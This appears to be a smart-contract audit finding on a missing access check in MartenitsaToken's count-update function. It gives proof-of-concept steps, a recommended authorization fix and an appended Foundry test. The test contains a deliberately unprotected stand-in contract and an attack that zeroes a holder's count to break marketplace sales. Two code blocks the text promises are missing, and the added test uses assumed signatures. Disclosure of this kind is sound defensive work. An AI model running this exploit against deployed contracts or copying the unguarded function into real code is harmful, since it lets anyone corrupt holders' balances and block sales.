The function MartenitsaToken::updateCountMartenitsaTokensOwner in the MartenitsaToken contract is currently callable by any account. This function is critical: it increments or decrements the token count recorded for a given address, and the marketplace relies on that count. It should therefore be callable only by authorized contracts or accounts, otherwise anyone can corrupt another holder's count.
1. User A owns 1 token.
2. User A lists the token for sale via MartenitsaMarketplace::listMartenitsaForSale.
3. An attacker calls MartenitsaToken::updateCountMartenitsaTokensOwner directly and decrements User A's token count to 0.
4. Any attempt to purchase User A's token via MartenitsaMarketplace::buyMartenitsa now fails: the purchase path decrements the seller's count again, and with checked arithmetic (Solidity 0.8.x) the subtraction from 0 underflows and reverts.
Add the following code to "MartenitsaToken.t.sol" for simulation:
Unauthorized access lets any account zero out or inflate another holder's token count. In the scenario above this blocks legitimate sales on the marketplace; more generally it breaks every invariant that depends on the recorded counts, threatening the integrity of the entire contract system.

Tools used: Foundry.
To address this vulnerability, add an authorization check for callers of MartenitsaToken::updateCountMartenitsaTokensOwner. For example, keep a mapping of authorized addresses (the marketplace, and any other contract that legitimately adjusts counts), let only the contract owner manage that mapping, and gate the function on it as follows:

With this change only authorized addresses can modify token counts; a direct call from an arbitrary account reverts instead of corrupting state, which restores the integrity of the count the marketplace depends on.
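The following Foundry test is an added example, not code from the original finding or from the Martenitsa project. It serves both the proof-of-concept steps above and the recommended mitigation: a deliberately minimal stand-in for MartenitsaToken with the unprotected function reproduces the attack (attacker zeroes User A's count, the next marketplace-style decrement underflows and reverts), and a hardened variant with an `isAuthorized` mapping rejects the same call. The function signature `(address, string)` with "add"/"sub" operations, the `Unauthorized` error, the `setAuthorized` helper and the addresses are all assumptions made for this example; adapt them to the real contract's signature.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the project's code. Minimal stand-ins for MartenitsaToken:
// only the per-owner counter and its update function matter for this finding.
import {Test, stdError} from "forge-std/Test.sol";

contract VulnerableMartenitsaToken {
    mapping(address => uint256) public countMartenitsaTokensOwner;

    // No access control: any caller can move any holder's count up or down.
    // (Assumed signature: the real contract may differ.)
    function updateCountMartenitsaTokensOwner(address holder, string memory operation) external {
        if (keccak256(bytes(operation)) == keccak256("add")) {
            countMartenitsaTokensOwner[holder] += 1;
        } else if (keccak256(bytes(operation)) == keccak256("sub")) {
            // Checked arithmetic: reverts with Panic(0x11) once the count is already 0.
            countMartenitsaTokensOwner[holder] -= 1;
        } else {
            revert("Wrong operation");
        }
    }
}

contract HardenedMartenitsaToken {
    error Unauthorized(address caller);

    address public immutable owner;
    mapping(address => bool) public isAuthorized;          // e.g. the marketplace contract
    mapping(address => uint256) public countMartenitsaTokensOwner;

    modifier onlyAuthorized() {
        if (!isAuthorized[msg.sender]) revert Unauthorized(msg.sender);
        _;
    }

    constructor() {
        owner = msg.sender;
    }

    // Only the contract owner may grant or revoke the right to adjust counts.
    function setAuthorized(address account, bool allowed) external {
        require(msg.sender == owner, "Not owner");
        isAuthorized[account] = allowed;
    }

    function updateCountMartenitsaTokensOwner(address holder, string memory operation) external onlyAuthorized {
        if (keccak256(bytes(operation)) == keccak256("add")) {
            countMartenitsaTokensOwner[holder] += 1;
        } else if (keccak256(bytes(operation)) == keccak256("sub")) {
            countMartenitsaTokensOwner[holder] -= 1;
        } else {
            revert("Wrong operation");
        }
    }
}

contract MartenitsaTokenAccessControlTest is Test {
    address userA = makeAddr("userA");
    address attacker = makeAddr("attacker");
    address marketplace = makeAddr("marketplace");

    // Steps 1-4 of the finding: attacker zeroes User A's count, the sale then underflows.
    function testAttackerCanZeroCountAndBreakSale() public {
        VulnerableMartenitsaToken token = new VulnerableMartenitsaToken();
        token.updateCountMartenitsaTokensOwner(userA, "add");     // User A owns 1 token
        assertEq(token.countMartenitsaTokensOwner(userA), 1);

        vm.prank(attacker);
        token.updateCountMartenitsaTokensOwner(userA, "sub");     // count -> 0
        assertEq(token.countMartenitsaTokensOwner(userA), 0);

        // A buy would decrement the seller's count once more and underflow.
        vm.prank(marketplace);
        vm.expectRevert(stdError.arithmeticError);
        token.updateCountMartenitsaTokensOwner(userA, "sub");
    }

    // Mitigation: the same attacker call reverts and the count is untouched.
    function testHardenedRejectsUnauthorizedCaller() public {
        HardenedMartenitsaToken token = new HardenedMartenitsaToken();
        token.setAuthorized(marketplace, true);

        vm.prank(marketplace);
        token.updateCountMartenitsaTokensOwner(userA, "add");
        assertEq(token.countMartenitsaTokensOwner(userA), 1);

        vm.prank(attacker);
        vm.expectRevert(abi.encodeWithSelector(HardenedMartenitsaToken.Unauthorized.selector, attacker));
        token.updateCountMartenitsaTokensOwner(userA, "sub");
        assertEq(token.countMartenitsaTokensOwner(userA), 1);
    }
}
```

Run with `forge test --match-contract MartenitsaTokenAccessControlTest -vvv`. The `stdError.arithmeticError` expectation pins the failure to the checked-arithmetic underflow rather than a generic revert, which is the precise failure mode the finding describes; in the real test file the buy should go through MartenitsaMarketplace::buyMartenitsa so the test exercises the actual call path.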